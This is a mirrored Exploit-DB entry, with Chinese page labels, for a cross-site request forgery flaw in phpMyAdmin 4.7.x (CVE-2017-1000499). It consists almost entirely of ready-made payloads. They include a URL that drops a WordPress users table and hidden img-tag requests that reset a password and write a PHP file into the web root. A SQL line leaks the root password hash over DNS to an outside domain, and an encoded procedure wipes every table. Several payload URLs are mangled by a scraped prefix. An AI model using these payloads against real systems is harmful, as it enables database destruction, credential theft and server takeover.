phpMyAdmin 4.7.x – Cross-Site Request Forgery

• Exploit Database
• 14 阅读

• 作者： VulnSpy
  日期： 2018-08-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45284/

• # Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery
  # Date: 2018-08-28
  # Exploit Author: VulnSpy
  # Vendor Homepage: https://www.phpmyadmin.net/
  # Software Link: https://www.phpmyadmin.net/downloads/
  # Version: Versions 4.7.x (prior to 4.7.7)
  # Tested on: php7 mysql5
  # CVE: CVE-2017-1000499 -- Original Exploit Author: Ashutosh Barot 
  
  # Original Exploit Author: Ashutosh Barot ( www.twitter.com/ashu_barot)
  # If victim DB Admin has active session with PhPMyAdmin < 4.7.7, Hitting this URL will result into DROP_TABLE, 
  
  https://example.com/phpMyAdmin/sql.php?db=DATABASE_NAME&goto=db_structure.php&table=wp_users&reload=1&purge=1&sql_query=DROP+TABLE+%60wp_users%60&message_to_show=Table+wp_users+has+been+dropped
  
  # Exploit CSRF - Modifying the password of current user
  
  <p>Hello World</p>
  <img src="https://www.exploit-db.com/exploits/45284/
  http://server/sql.php?db=mysql&table=user&sql_query=SET%20password
  %20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />
  
  # Exploit CSRF - Arbitrary File Write
  
  <p>Hello World</p>
  <img src="https://www.exploit-db.com/exploits/45284/
  http://server/sql.php?db=mysql&table=user&sql_query=select
  '<?php phpinfo();?>' into outfile '/var/www/html/test.php';"
  style="display:none;" />
  
  # Exploit CSRF - Data Retrieval over DNS
  
  SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE
  user='root' LIMIT 1),'.vulnspy.com\\test'));
  
  # Exploit CSRF - Empty All Rows From All Tables
  
  <p>Hello World</p>
  <img src="https://www.exploit-db.com/exploits/45284/
  http://server/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A"
  style="display:none;" />